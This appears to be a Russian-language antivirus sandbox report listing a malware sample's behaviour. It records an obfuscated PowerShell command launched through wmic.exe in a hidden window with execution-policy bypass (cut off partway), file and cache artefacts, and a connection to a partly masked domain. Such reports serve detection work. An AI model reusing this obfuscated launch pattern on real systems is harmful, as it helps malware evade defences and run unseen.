Техническая информация
- '<SYSTEM32>\wbem\wmic.exe' "PrOCess" CALL CreaTe "pOWershELl -nOnIntERACTI -EXEcut bypaSS -WIn 000000000000000001 $J0P =([CHar]34).ToStrINg() ;SV 0L4 (([ChAr]44).ToStriNG() ) ; "\" `${0`Ai}= [type](${J0P...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 968
- %TEMP%\1055093.cvr
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- 'go###tto.com':443
- DNS ASK go###tto.com
- '<SYSTEM32>\wbem\wmic.exe' "PrOCess" CALL CreaTe "pOWershELl -nOnIntERACTI -EXEcut bypaSS -WIn 000000000000000001 $J0P =([CHar]34).ToStrINg() ;SV 0L4 (([ChAr]44).ToStriNG() ) ; "\" `${0`Ai}= [type](${J0P...' (со скрытым окном)